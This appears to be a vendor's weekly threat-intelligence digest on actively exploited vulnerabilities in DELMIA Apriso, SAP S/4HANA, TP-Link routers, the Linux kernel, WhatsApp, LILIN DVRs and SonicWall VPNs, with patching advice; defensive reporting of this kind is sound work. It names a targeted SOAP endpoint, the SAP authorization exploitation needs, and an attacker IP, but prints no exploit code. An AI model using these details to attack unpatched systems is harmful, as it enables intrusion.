This week's cybersecurity landscape has been marked by continued exploitation of critical vulnerabilities across enterprise and consumer technologies. A deserialization vulnerability in Dassault Systèmes DELMIA Apriso, which was actively exploited last week, has now been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the persistent risks facing industrial environments. Meanwhile, a command injection flaw in SAP S/4HANA has entered the spotlight after being confirmed under active exploitation, raising major concerns for organizations running both on-premises and cloud deployments.

Meanwhile, TP-Link Router vulnerabilities, Linux Kernel TOCTOU flaw, and WhatsApp vulnerability - that were recently added to the CISA KEV catalog last week, continue to trend, signaling that attackers remain focused on weaponizing them in the wild.

Botnet activity is on the rise, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. At the same time, IoT-focused botnets like Mirai, Bashlite, Tsunami, and BrickerBot have intensified attacks on EirD1000 routers, aiming to establish persistence and enable lateral movement.

Adding to the wave of threat activity, 360NetLab reported that multiple groups are exploiting a vulnerability in LILIN DVRs to spread botnets including Chalubo, FBot and Moobot. Meanwhile, the Australian Cyber Security Centre (ACSC) issued an alert on the active exploitation of a SonicWall Vulnerability directly tied to Akira ransomware intrusions against Australian organizations.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-5086
A Deserialization of Untrusted Data Vulnerability has been identified in the DELMIA Apriso, affecting releases from 2020 through 2025 and carrying a critical CVSS score of 9.0. Dassault Systèmes issued an advisory in June 2025, warning that the flaw could enable remote code execution in Apriso’s Manufacturing Operation Management (MOM) and Manufacturing Execution System (MES) platforms, which form the backbone of many industrial environments. Recently, researchers at SANS.edu have observed active exploitation attempts traced to IP 156.244.33(.)162. The attacks use SOAP POST requests targeting /apriso/WebServices/FlexNetOperationsService.svc/Invoke, embedding malicious objects in XML that decode into Windows executables. Organizations are strongly urged to apply the available patches, monitor for suspicious SOAP traffic and Base64 payloads, and restrict internet exposure of MOM/MES systems to reduce risk. The vulnerability has also been added to the  CISA KEV catalog, underscoring its active exploitation and critical nature.

CVE-2025-9377
An OS Command Injection vulnerability has been identified in the TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 routers, specifically within the Parental Control page. The flaw affects firmware versions released before 241108, allowing attackers to potentially inject and execute malicious commands. While TP-Link issued patched firmware for these models, both devices have since reached end-of-life (EoL), meaning they will no longer receive long-term support or security updates beyond the available fix. Users are therefore strongly encouraged to migrate to newer hardware that ensures ongoing protection and performance. For those unable to upgrade immediately, TP-Link recommends applying the patched firmware, restoring the router, and disabling remote management in favor of the official Tether app. The flaw has also been added to the CISA’s Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation risk.

CVE-2025-38352
A TOCTOU (Time-of-Check Time-of-Use) Race Condition Vulnerability has been discovered in the Linux Kernel's POSIX CPU timers subsystem. This issue occurs when a non-autoreaping task, during its exit process, triggers a race between handle_posix_cpu_timers() and posix_cpu_timer_del(), potentially leading to missed timer detections, unstable task cleanup, and overall system instability. Google addressed the issue in its Android security updates by introducing exit_state validation to mitigate the flaw. Actively exploited as a zero-day in limited, targeted attacks, this kernel-level vulnerability has also been added to CISA  KEV catalog, underscoring its severity and ongoing risk.

CVE-2025-42957
A Command Injection Vulnerability in SAP S/4HANA (affecting both on-premises and private cloud editions) is now under active exploitation. Though SAP released a patch on August 11,2025 to resolve this vulnerability, unpatched systems remain exposed to severe risk. Successful exploitation allows attackers with only low-level user credentials and the S_DMIS authorization with activity 02 to abuse an RFC-exposed function module, requiring no user interaction. A compromise could grant adversaries full control of the SAP environment, including altering the database, creating SAP_ALL privileged superuser accounts, extracting password hashes, and disrupting essential business processes, thereby undermining confidentiality, integrity, and availability. SecurityBridge Threat Research Labs has confirmed recent exploitation attempts, while Pathlock has reported detecting suspicious activity consistent with this vulnerability, warning that an exploit is actively circulating and that organizations without the August 2025 security updates face heightened risk.

CVE-2025-55177
An Incorrect Authorization vulnerability in WhatsApp has been identified, allowing an unrelated user to force a target’s device into processing content from a malicious URL. The flaw impacted WhatsApp for iOS (prior to v2.25.21.73), WhatsApp Business for iOS (v2.25.21.78), and WhatsApp for Mac (v2.25.21.78) before being patched by the company, which has also begun issuing security notifications to individuals believed to have been targeted over the past three months. Although serious on its own, the risk was amplified when combined with Apple’s CVE-2025-43300, an out-of-bounds write vulnerability in the Image I/O framework affecting iOS, iPadOS, and macOS. This exploit chain enabled a sophisticated “zero-click” attack, requiring no user interaction, that has reportedly impacted both iPhone and Android users, including journalists and human rights defenders, highlighting the persistent risks posed by government spyware. The flaw has since been added to CISA KEV catalog.

CVE-2023-50224
An Authentication Bypass by Spoofing Vulnerability has been identified in the TP-Link TL-WR841N router, specifically within the httpd service that listens on TCP port 80. The flaw enables network-adjacent attackers to access sensitive information, including stored credentials, without authentication. Once compromised, these credentials can provide attackers with a pathway to further infiltrate the device and connected systems. As the affected products have already reached end-of-life (EoL) and will not receive security updates, users are strongly advised to replace them with supported hardware. This vulnerability has also been added to the CISA KEV catalog recently, underscoring its exploitation risk.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-34130
360Netlab reported that since August 2019, its unknown threat detection system has observed multiple groups exploiting a zero-day vulnerability in LILIN DVRs to distribute botnets such as Chalubo, FBot, and Moobot. The exploited vulnerability is an arbitrary file read issue in /z/zbin/net_html.cgi. In February 2020, the manufacturer addressed the issue and released the firmware program 2.0b60_20200207 to patch the vulnerabilities. These findings underscore how unpatched or poorly secured IoT devices can become a persistent attack vector, fueling botnet operations for years.

CVE-2024-40766
The Australian Cyber Security Centre (ACSC) has issued an alert regarding the active exploitation of CVE-2024-40766, a critical vulnerability in SonicWall SSL VPNs that has been directly linked to Akira ransomware intrusions against Australian organizations. The flaw affects Gen 5, Gen 6, and Gen 7 SonicWall devices running vulnerable SonicOS versions, and successful exploitation can grant attackers unauthorized access to corporate networks or even crash the firewall, escalating the impact. According to the ACSC, threat actors are actively leveraging this weakness, with Akira ransomware groups increasingly using VPN vulnerabilities as entry points. Considering this, the agency is urging all organizations to immediately patch their devices, stressing that the latest security builds are available for download via mysonicwall.com.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-adds-one-known-exploited-vulnerability-catalog
2. https://securitybridge.com/blog/critical-sap-s-4hana-code-injection-vulnerability-cve-2025-42957/
3. https://pathlock.com/blog/security-alerts/cve-2025-42957-critical-sap-s-4hana-code-injection-vulnerability/  
4. https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog
5. https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/  
6. https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/ongoing-active-exploitation-of-sonicwall-ssl-vpns-in-australia  
7. https://source.android.com/docs/security/bulletin/2025-09-01  
8. https://www.whatsapp.com/security/advisories/2025?